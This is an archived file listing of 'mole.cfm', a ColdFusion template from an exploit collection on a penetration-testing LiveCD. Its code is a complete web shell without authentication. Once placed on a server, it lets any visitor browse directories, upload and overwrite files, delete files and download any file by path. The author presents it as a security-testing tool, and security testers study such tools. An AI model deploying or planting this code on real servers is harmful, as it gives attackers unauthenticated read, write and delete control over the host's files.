home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / coldfusion / mole.cfm.txt < prev    next >
Encoding:
Text File  |  2005-02-12  |  2.4 KB  |  84 lines
  1. <!---
  2. This Cold Fusion template is intended for testing security
  3. on ColdFusion application servers. It will let a web user
  4. upload, download and delete files on a server. 
  5.  
  6. Use this only for good, not evil.
  7. Kevin Klinsky
  8. kklinsky@themerge.com
  9. --->
  10.  
  11. <CFPARAM NAME="DirPath" DEFAULT="#GetTempDirectory()#">
  12. <CFSET THISTEMPLATE=GETFILEFROMPATH(GETTEMPLATEPATH())>
  13.  
  14. <CFIF LISTLAST("#DirPath#","\") IS ".">
  15.     <CFSET DIRPATH=GETDIRECTORYFROMPATH(DIRPATH)>
  16. <CFELSEIF LISTLAST("#DirPath#","\") IS "..">
  17.     <CFSET DIRPATH=GETDIRECTORYFROMPATH(LEFT("#GetDirectoryFromPath(DirPath)#",LEN(GETDIRECTORYFROMPATH(DIRPATH))-1))>
  18. </CFIF>
  19.  
  20. <CFIF ISDEFINED("uploadfile")>
  21.     <CFIF LEN(UPLOADFILE) GT 0>
  22.         <CFFILE ACTION="UPLOAD"
  23.             FILEFIELD="uploadfile"
  24.              DESTINATION="#DirPath#"
  25.             NAMECONFLICT="OVERWRITE">
  26. File uploaded<BR><BR>
  27.     </CFIF>
  28. </CFIF>
  29.  
  30. <CFIF ISDEFINED("deletefile")>
  31.     <CFSET DELETEFILE=DIRPATH&DELETEFILE>
  32.     <CFIF FILEEXISTS(DELETEFILE)>
  33.         <CFFILE ACTION="DELETE"
  34.             FILE="#deletefile#">
  35.         File deleted<BR><BR>
  36.     </CFIF>
  37. </CFIF>
  38.  
  39.  
  40.  
  41. <CFIF GETFILEFROMPATH(DIRPATH) IS "" OR GETFILEFROMPATH(DIRPATH) IS ".">    
  42.     <CFDIRECTORY DIRECTORY="#DirPath#"
  43.         NAME=DIRDETAILS
  44.         SORT="name ASC">
  45.     <CFOUTPUT>
  46.     <FONT SIZE="+2">#DirPath#</FONT><BR>
  47.     </CFOUTPUT>
  48.     <TABLE>
  49.     <TR>
  50.         <TD></TD>
  51.         <TD>Name</TD>
  52.         <TD ALIGN="right">Size</TD>
  53.         <TD>Modified date</TD>
  54.     </TR>
  55.     <CFOUTPUT QUERY="DirDetails">
  56.     <CFSET NEWPATH = URLENCODEDFORMAT(DIRPATH&NAME)>
  57.     <CFIF TYPE IS "Dir" AND NAME IS NOT "." AND NAME IS NOT "..">
  58.         <CFSET NEWPATH=NEWPATH&"\">
  59.     </CFIF>
  60.     <TR>
  61.         <TD>[#Type#]</TD>
  62.         <TD><A HREF="#ThisTemplate#?DirPath=#NewPath#">#Name#</A></TD>
  63.         <TD ALIGN="right">#Size#</TD>
  64.         <TD>#DateLastModified#</TD>
  65.         <CFIF TYPE IS "File">
  66.         <FORM ACTION="#ThisTemplate#?DirPath=#GetDirectoryFromPath(DirPath)#&deletefile=#URLEncodedFormat(Name)#" METHOD="post">
  67.         <TD><INPUT TYPE="submit" VALUE="Delete"></TD>
  68.         </FORM>
  69.         </CFIF>
  70.     </TR>
  71.     </CFOUTPUT>
  72.     </TABLE>
  73.     <CFOUTPUT>
  74.     <FORM ACTION="#ThisTemplate#?DirPath=#URLEncodedFormat(DirPath)#" ENCTYPE="multipart/form-data"  METHOD=POST>
  75.     <INPUT TYPE="File" NAME="uploadfile" SIZE="30"><BR>
  76.     <INPUT TYPE="submit" VALUE=" Upload ">
  77.     </FORM>
  78.     </CFOUTPUT>
  79. <CFELSE>
  80. <CFFILE ACTION="Read"
  81.         FILE="#DirPath#"
  82.         VARIABLE="var_name">    
  83. <CFCONTENT TYPE="unknown:security.breach" FILE="#DirPath#" DELETEFILE="No">
  84. </CFIF>